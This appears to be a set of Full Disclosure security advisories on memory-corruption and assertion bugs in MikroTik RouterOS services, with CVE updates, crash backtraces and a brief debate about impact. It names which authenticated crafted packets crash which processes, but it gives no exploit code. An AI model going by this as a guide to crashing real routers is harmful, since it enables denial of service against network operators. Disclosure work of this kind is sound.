Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
[update 2022/05/30] Two CVEs have been assigned to these vulnerabilities. CVE-2021-36613: Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the ptp process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE-2021-36614: Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the tr069-client process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). Q C 于2021年7月6日周二 19:26写道: > Advisory: three vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) from Codesafe Team of Legendsec at > Qi'anxin Group > > > Product Description > == > > RouterOS is the operating system used on MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > 1. reachable assertion failure > The netwatch process suffers from an assertion failure vulnerability. > There is a reachable assertion in the netwatch process. By sending a > crafted packet, an authenticated remote user can crash the netwatch process > due to assertion failure. > > Against stable 6.47, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.29-14:27:25.52@0: > 2020.06.29-14:27:25.52@0: > 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch > 2020.06.29-14:27:25.52@0: --- signal=6 > > 2020.06.29-14:27:25.52@0: > 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246 > 2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 > ebp=0x7feea6a0 esp=0x7feea698 > 2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8 > ecx=0x00b8 edx=0x0006 > 2020.06.29-14:27:25.52@0: > 2020.06.29-14:27:25.52@0: maps: > 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00:10 14 > /ram/pckg/advanced-tools/nova/bin/netwatch > 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00:0c 966 > /lib/libuClibc-0.9.33.2.so > 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp 00:0c 962 > /lib/libgcc_s.so.1 > 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00:0c 945 > /lib/libuc++.so > 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp 00:0c 947 > /lib/libumsg.so > 2020.06.29-14:27:25.52@0: 7774-77747000 r-xp 00:0c 960 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.29-14:27:25.52@0: > 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698 > 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 > 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00 > 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa > 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff > 2020.06.29-14:27:25.52@0: > 2020.06.29-14:27:25.52@0: code: 0x776b855b > 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff > f7 d8 > > This vulnerability was initially found in stable 6.46.2, and it seems that > the latest stable version 6.48.3 still suffers from this vulnerability. > > 2. NULL pointer dereference > The tr069-client process suffers from a memory corruption vulnerability. > By sending a crafted packet, an authenticated remote user can crash the > tr069-client process due to NULL pointer dereference. > > Against stable 6.47, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.10-17:04:17.63@0: > 2020.06.10-17:04:17.63@0: > 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client > 2020.06.10-17:04:17.63@0: --- signal=11 > > 2020.06.10-17:04:17.63@0: > 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206 > 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 > ebp=0x7ff74988 esp=0x7ff7497c > 2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290 > ecx=0x776924ec edx=0x7769187c > 2020.06.10-17:04:17.63@0: > 2020.06.10-17:04:17.63@0: maps: > 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp 00:10 13 > /ram/pckg/tr069-client/nova/bin/tr069-client > 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp 00:0c 966 > /lib/libuClibc-0.9.33.2.so > 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp 00:0c 962 > /lib/libgcc_s.so.1 > 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp 00:0c 945 > /lib/libuc++.s
[FD] Three vulnerabilities found in MikroTik's RouterOS
Advisory: three vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) from Codesafe Team of Legendsec at Qi'anxin Group Product Description == RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. reachable assertion failure The netwatch process suffers from an assertion failure vulnerability. There is a reachable assertion in the netwatch process. By sending a crafted packet, an authenticated remote user can crash the netwatch process due to assertion failure. Against stable 6.47, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.29-14:27:25.52@0: 2020.06.29-14:27:25.52@0: 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch 2020.06.29-14:27:25.52@0: --- signal=6 2020.06.29-14:27:25.52@0: 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246 2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 ebp=0x7feea6a0 esp=0x7feea698 2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8 ecx=0x00b8 edx=0x0006 2020.06.29-14:27:25.52@0: 2020.06.29-14:27:25.52@0: maps: 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00:10 14 /ram/pckg/advanced-tools/nova/bin/netwatch 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp 00:0c 962 /lib/libgcc_s.so.1 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00:0c 945 /lib/libuc++.so 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp 00:0c 947 /lib/libumsg.so 2020.06.29-14:27:25.52@0: 7774-77747000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 2020.06.29-14:27:25.52@0: 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff 2020.06.29-14:27:25.52@0: 2020.06.29-14:27:25.52@0: code: 0x776b855b 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 This vulnerability was initially found in stable 6.46.2, and it seems that the latest stable version 6.48.3 still suffers from this vulnerability. 2. NULL pointer dereference The tr069-client process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the tr069-client process due to NULL pointer dereference. Against stable 6.47, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.10-17:04:17.63@0: 2020.06.10-17:04:17.63@0: 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client 2020.06.10-17:04:17.63@0: --- signal=11 2020.06.10-17:04:17.63@0: 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988 esp=0x7ff7497c 2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290 ecx=0x776924ec edx=0x7769187c 2020.06.10-17:04:17.63@0: 2020.06.10-17:04:17.63@0: maps: 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp 00:10 13 /ram/pckg/tr069-client/nova/bin/tr069-client 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp 00:0c 962 /lib/libgcc_s.so.1 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp 00:0c 945 /lib/libuc++.so 2020.06.10-17:04:17.63@0: 77693000-7769d000 r-xp 00:0c 963 /lib/libm-0.9.33.2.so 2020.06.10-17:04:17.63@0: 7769f000-776bc000 r-xp 00:0c 948 /lib/libucrypto.so 2020.06.10-17:04:17.63@0: 776bd000-776c r-xp 00:0c 954 /lib/libxml.so 2020.06.10-17:04:17.63@0: 776c1000-7770d000 r-xp 00:0c 947 /lib/libumsg.so 2020.06.10-17:04:17.63@0: 7771-7771b000 r-xp 00:0c 955 /lib/libuhttp.so 2020.06.10-17:04:17.63@0: 7771c000-77724000 r-xp 00:0c 951 /lib/libubox.so 2020.06.10-17:04:17.63@0: 77728000-7772f000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 2020.06.10-17:04:17.63@0: 2020.06.10-17:04:17.63@0: stack: 0x7ff75000 - 0x7ff7497c 2020.06.10-17:04:17.63@0: 10 a0 08 08 40 4b 72 77 90 92 0a 08 b8 49 f7 7f 7c fa 71 77 90 92 0a 08 04 4a f7 7f 05 00 00 00 2020.06.10-17:04:17.63@0: 28 4a f7 7f b4 49 f7 7f 40 4b 72 77 88 5b 09 08 40 4b 72 77 80 4d f7 7f 04 4a f7 7f 28 4a f7 7f 2020.06.10-17:04:17.63@0:
[FD] Four vulnerabilities found in MikroTik's RouterOS
Advisory: four vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: only CVE-2020-20227 is fixed CVE: CVE-2020-20220, CVE-2020-20227, CVE-2020-20245, CVE-2020-20246 Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These vulnerabilities were reported to the vendor almost one year ago. And the vendor confirmed these vulnerabilities. 1. CVE-2020-20220 The bfd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the bfd process due to invalid memory access. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.19-18:36:13.88@0: 2020.06.19-18:36:13.88@0: 2020.06.19-18:36:13.88@0: /ram/pckg/routing/nova/bin/bfd 2020.06.19-18:36:13.88@0: --- signal=11 2020.06.19-18:36:13.88@0: 2020.06.19-18:36:13.88@0: eip=0x0804b175 eflags=0x00010202 2020.06.19-18:36:13.88@0: edi=0x08054a90 esi=0x08054298 ebp=0x7f9d3e88 esp=0x7f9d3e70 2020.06.19-18:36:13.88@0: eax=0x08050634 ebx=0x7af0 ecx=0x08051274 edx=0x0001 2020.06.19-18:36:13.88@0: 2020.06.19-18:36:13.88@0: maps: 2020.06.19-18:36:13.88@0: 08048000-0805 r-xp 00:1b 16 /ram/pckg/routing/nova/bin/bfd 2020.06.19-18:36:13.88@0: 7759a000-7759c000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so 2020.06.19-18:36:13.88@0: 7759e000-775d3000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.19-18:36:13.88@0: 775d7000-775f1000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.19-18:36:13.88@0: 775f2000-77601000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.19-18:36:13.88@0: 77602000-7775f000 r-xp 00:0c 954 /lib/libcrypto.so.1.0.0 2020.06.19-18:36:13.88@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so 2020.06.19-18:36:13.88@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.19-18:36:13.88@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.19-18:36:13.88@0: 2020.06.19-18:36:13.88@0: stack: 0x7f9d4000 - 0x7f9d3e70 2020.06.19-18:36:13.88@0: 34 06 05 08 d0 e6 04 08 d8 3e 9d 7f 90 4a 05 08 98 42 05 08 d8 3e 9d 7f f8 3e 9d 7f 6d 39 77 77 2020.06.19-18:36:13.88@0: 90 4a 05 08 28 40 9d 7f 05 00 00 00 00 43 05 08 00 00 00 00 28 90 7c 77 01 00 00 00 0c 00 00 00 2020.06.19-18:36:13.88@0: 2020.06.19-18:36:13.88@0: code: 0x804b175 2020.06.19-18:36:13.88@0: ff 05 00 00 00 00 83 c4 10 c9 c3 55 89 e5 53 83 This vulnerability was initially found in long-term 6.44.6, and it seems that the latest stable version 6.48.2 still suffer from this vulnerability. 2. CVE-2020-20227 The diskd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the diskd process due to invalid memory access. Against stable 6.47, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.05-15:00:38.33@0: 2020.06.05-15:00:38.33@0: 2020.06.05-15:00:38.33@0: /nova/bin/diskd 2020.06.05-15:00:38.33@0: --- signal=11 2020.06.05-15:00:38.33@0: 2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202 2020.06.05-15:00:38.33@0: edi=0x7f9dd024 esi=0x000a ebp=0x7f9dceb8 esp=0x7f9dceac 2020.06.05-15:00:38.33@0: eax=0x000a ebx=0x777624ec ecx=0x08054600 edx=0x08056e18 2020.06.05-15:00:38.33@0: 2020.06.05-15:00:38.33@0: maps: 2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp 00:0c 1049 /nova/bin/diskd 2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so 2020.06.05-15:00:38.33@0: 77738000-77752000 r-xp 00:0c 962 /lib/libgcc_s.so.1 2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp 00:0c 945 /lib/libuc++.so 2020.06.05-15:00:38.33@0: 77763000-7776b000 r-xp 00:0c 951 /lib/libubox.so 2020.06.05-15:00:38.33@0: 7776c000-777b8000 r-xp 00:0c 947 /lib/libumsg.so 2020.06.05-15:00:38.33@0: 777be000-777c5000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 2020.06.05-15:00:38.33@0: 2020.06.05-15:00:38.33@0: stack: 0x7f9de000 - 0x7f9dceac 2020.06.05-15:00:38.33@0: f4 8a 7b 77 0a 00 00 00 f4 8a 7b 77 e8 ce 9d 7f 92 be 78 77 f8 45 05 08 0a 00 00 00 18 6e 05 08 2020.06.05-15:00:38.33@0: 18 6e 05 08 e4 ce 9d 7f 24 d0 9d 7f 7c 18 76 77 24 d0 9d 7f 18 69 05 08 40 cf 9d 7f a8 cf 9d 7f 2020.06.05-15:00:38.34@0: 2020.06.05-15:00:38.34@0: code: 0x7775a1e3 2020.06.05-15:00:38.34@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04
Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
Hi, In Mikrotik RouterOs, each user is assigned to a user group, which denotes the rights of this user. A group policy is a combination of individual policy items, and provides a convenient way to assign different permissions and access rights to different user classes.(Reference: https://help.mikrotik.com/docs/display/ROS/User) Some common individual policy items are: web, winbox, read, write, reboot and so on. Among of them, reboot is treated as a separate permission. So an authenticated user may not have the permission to reboot the device. As to these vulnerabilities (or software bugs?), reboot permission is not required to trigger them. And they may pose an impact on the system services or even reboot the system. Of course, since authentication is still necessary to trigger them, they have a low impact. Thanks! Gynvael Coldwind 于2021年5月8日周六 上午12:09写道: > Hi, > > I might be missing something, but how are these considered vulnerabilities? > My point is that these require authentication, and an already > authenticated user already has permissions to reboot the device anyway, > right? > > If the above assumption is correct, then there isn't really a security > boundary breach, so it would be a software bug, but not a vulnerability. > Or am I missing something? > > Thanks, > Gynvael > > On Fri, May 7, 2021 at 5:51 PM Q C wrote: > >> [update 2021/05/04] Three CVEs have been assigned to these >> vulnerabilities. >> >> CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a >> memory corruption vulnerability in the /nova/bin/diskd process. An >> authenticated remote attacker can cause a Denial of Service due to invalid >> memory access. >> >> CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a >> memory corruption vulnerability in the /nova/bin/graphing process. An >> authenticated remote attacker can cause a Denial of Service (NULL pointer >> dereference) >> >> CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an >> stack exhaustion vulnerability in the /nova/bin/net process. An >> authenticated remote attacker can cause a Denial of Service due to >> overloading the systems CPU >> >> >> >> Q C 于2020年7月22日周三 下午8:11写道: >> >> > Advisory: three vulnerabilities found in MikroTik's RouterOS >> > >> > >> > Details >> > === >> > >> > Product: MikroTik's RouterOS >> > Vendor URL: https://mikrotik.com/ >> > Vendor Status: fixed version released >> > CVE: - >> > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team >> > >> > >> > Product Description >> > == >> > >> > RouterOS is the operating system used on the MikroTik's devices, such as >> > switch, router and access point. >> > >> > >> > Description of vulnerabilities >> > == >> > >> > 1. Memory corruption vulnerability >> > The diskd process suffers from a memory corruption vulnerability. By >> > sending a crafted packet, an authenticated remote user can crash the >> diskd >> > process due to invalid memory access. >> > >> > Against stable 6.44.3, the poc resulted in the following crash dump. >> > >> > # cat /rw/logs/backtrace.log >> > 2020.06.04-14:18:22.55@0: >> > 2020.06.04-14:18:22.55@0: >> > 2020.06.04-14:18:22.55@0: /nova/bin/diskd >> > 2020.06.04-14:18:22.55@0: --- signal=11 >> > >> > 2020.06.04-14:18:22.55@0: >> > 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202 >> > 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 >> > ebp=0x7fd40b78 esp=0x7fd40b6c >> > 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec >> > ecx=0x776d54ec edx=0x20fe0010 >> > 2020.06.04-14:18:22.55@0: >> > 2020.06.04-14:18:22.55@0: maps: >> > 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00:0c >> 1131 >> > /nova/bin/diskd >> > 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00:0c 996 >> > /lib/libuClibc-0.9.33.2.so >> > 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00:0c 992 >> > /lib/libgcc_s.so.1 >> > 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00:0c 976 >> > /lib/libuc++.so >> > 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00:0c 982 >> > /lib/libubox.so >> > 2020.06.04-14:18:2
[FD] Four vulnerabilities found in MikroTik's RouterOS
Advisory: four vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: no fix yet CVE: CVE-2020-20214, CVE-2020-20222, CVE-2020-20236, CVE-2020-20237 Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These vulnerabilities were reported to the vendor almost one year ago. And the vendor confirmed these vulnerabilities. However, there is still no fix for them yet. By the way, the three vulnerabilities in sniffer binary are different from each one. 1. CVE-2020-20214 The btest process suffers from an assertion failure vulnerability. There is a reachable assertion in the btest process. By sending a crafted packet, an authenticated remote user can crash the btest process due to assertion failure. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.19-15:51:36.94@0: 2020.06.19-15:51:36.94@0: 2020.06.19-15:51:36.94@0: /nova/bin/btest 2020.06.19-15:51:36.94@0: --- signal=6 2020.06.19-15:51:36.94@0: 2020.06.19-15:51:36.94@0: eip=0x7772255b eflags=0x0246 2020.06.19-15:51:36.94@0: edi=0x00fe0001 esi=0x7772a200 ebp=0x7fdcf880 esp=0x7fdcf878 2020.06.19-15:51:36.94@0: eax=0x ebx=0x010f ecx=0x010f edx=0x0006 2020.06.19-15:51:36.94@0: 2020.06.19-15:51:36.94@0: maps: 2020.06.19-15:51:36.94@0: 08048000-08057000 r-xp 00:0c 1006 /nova/bin/btest 2020.06.19-15:51:36.94@0: 776f4000-77729000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.19-15:51:36.94@0: 7772d000-77747000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.19-15:51:36.94@0: 77748000-77757000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.19-15:51:36.94@0: 77758000-5000 r-xp 00:0c 947 /lib/libucrypto.so 2020.06.19-15:51:36.94@0: 6000-777c2000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.19-15:51:36.94@0: 777c8000-777cf000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.19-15:51:36.94@0: 2020.06.19-15:51:36.94@0: stack: 0x7fdd - 0x7fdcf878 2020.06.19-15:51:36.94@0: 00 a0 72 77 00 a0 72 77 b8 f8 dc 7f 77 e0 71 77 06 00 00 00 00 a2 72 77 20 00 00 00 00 00 00 00 2020.06.19-15:51:36.94@0: 16 00 00 00 18 f9 dc 7f b4 f8 dc 7f e4 2a 7c 77 01 00 00 00 e4 2a 7c 77 16 00 00 00 01 00 fe 00 2020.06.19-15:51:36.94@0: 2020.06.19-15:51:36.94@0: code: 0x7772255b 2020.06.19-15:51:36.94@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 This vulnerability was initially found in long-term 6.44.5, and it seems that the latest stable version 6.48.2 still suffers from this vulnerability. 2. CVE-2020-20222 The sniffer process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the sniffer process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.19-16:36:18.33@0: 2020.06.19-16:36:18.33@0: 2020.06.19-16:36:18.33@0: /nova/bin/sniffer 2020.06.19-16:36:18.33@0: --- signal=11 2020.06.19-16:36:18.33@0: 2020.06.19-16:36:18.33@0: eip=0x08050e33 eflags=0x00010206 2020.06.19-16:36:18.33@0: edi=0x08057a24 esi=0x7f85c094 ebp=0x7f85c0c8 esp=0x7f85c080 2020.06.19-16:36:18.33@0: eax=0x ebx=0x7f85c090 ecx=0x00ff edx=0x08059678 2020.06.19-16:36:18.33@0: 2020.06.19-16:36:18.33@0: maps: 2020.06.19-16:36:18.33@0: 08048000-08056000 r-xp 00:0c 1034 /nova/bin/sniffer 2020.06.19-16:36:18.33@0: 776ce000-77703000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.19-16:36:18.33@0: 77707000-77721000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.19-16:36:18.33@0: 77722000-77731000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.19-16:36:18.33@0: 77732000-7773a000 r-xp 00:0c 950 /lib/libubox.so 2020.06.19-16:36:18.33@0: 7773b000-77787000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.19-16:36:18.33@0: 7778d000-77794000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.19-16:36:18.33@0: 2020.06.19-16:36:18.33@0: stack: 0x7f85d000 - 0x7f85c080 2020.06.19-16:36:18.33@0: 2c 08 07 08 04 00 fe 08 fe 00 00 00 20 ad 05 08 00 0c 07 08 a0 0b 07 08 af 0b 07 08 04 7a 05 08 2020.06.19-16:36:18.33@0: 08 00 00 00 24 7a 05 08 ff 00 00 00 00 00 00 00 08 c2 85 7f e4 7a 78 77 d8 c0 85 7f e4 7a 78 77 2020.06.19-16:36:18.34@0: 2020.06.19-16:36:18.34@0: code: 0x8050e33 2020.06.19-16:36:18.34@0: 0b 48 0c 89 fa 89 d8 e8 7d f1 ff ff 50 50 53 56 This vulnerability was initially
Re: [FD] Four vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to two of these vulnerabilities. CVE-2020-20254: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE-2020-20253: Mikrotik RouterOs before 6.47 (stable tree) in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service due to a divide by zero error. Q C 于2020年7月7日周二 下午10:05写道: > Advisory: four vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: through stable 6.47 > Fixed Versions: stable 6.47 > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These four vulnerabilities were tested only against the MikroTik RouterOS > stable release tree when found. > Maybe other release trees also suffer from these vulnerabilities. > > PS: The following three memory corruption vulnerabilities are different. > > 1. NULL pointer dereference vulnerability > The lcdstat process suffers from a memory corruption vulnerability. By > sending a crafted packet, > an authenticated remote user can crash the lcdstat process due to NULL > pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-15:32:04.67@0: > 2020.06.04-15:32:04.67@0: > 2020.06.04-15:32:04.67@0: /nova/bin/lcdstat > 2020.06.04-15:32:04.67@0: --- signal=11 > > 2020.06.04-15:32:04.67@0: > 2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202 > 2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc > ebp=0x7fbeae18 esp=0x7fbeadf4 > 2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 > ecx=0x0807f14c edx=0x0001 > 2020.06.04-15:32:04.67@0: > 2020.06.04-15:32:04.67@0: maps: > 2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00:0c 1054 > /nova/bin/lcdstat > 2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-15:32:04.67@0: 77736000-7775 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-15:32:04.67@0: 77751000-7776 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.04-15:32:04.67@0: > 2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4 > 2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 > 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f > 2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 > be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f > 2020.06.04-15:32:04.67@0: > 2020.06.04-15:32:04.67@0: code: 0x805a26e > 2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 > 83 c4 > > 2. NULL pointer dereference vulnerability > The lcdstat process suffers from a memory corruption vulnerability. By > sending a crafted packet, > an authenticated remote user can crash the lcdstat process due to NULL > pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-15:48:13.77@0: > 2020.06.04-15:48:13.77@0: > 2020.06.04-15:48:13.77@0: /nova/bin/lcdstat > 2020.06.04-15:48:13.77@0: --- signal=11 > > 2020.06.04-15:48:13.77@0: > 2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246 > 2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff > ebp=0x7fd8cb48 esp=0x7fd8cb2c > 2020.06.04-15:48:13.77@0: eax=0x ebx=0x > ecx=0x edx=0x > 2020.06.04-15:48:13.77@0: > 2020.06.04-15:48:13.77@0: maps: > 2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp 00:0c 1054 > /nova/bin/lcdstat > 2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/resolver process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access. CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /nova/bin/user process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet. Q C 于2020年9月9日周三 下午9:02写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. memory corruption > The resolver 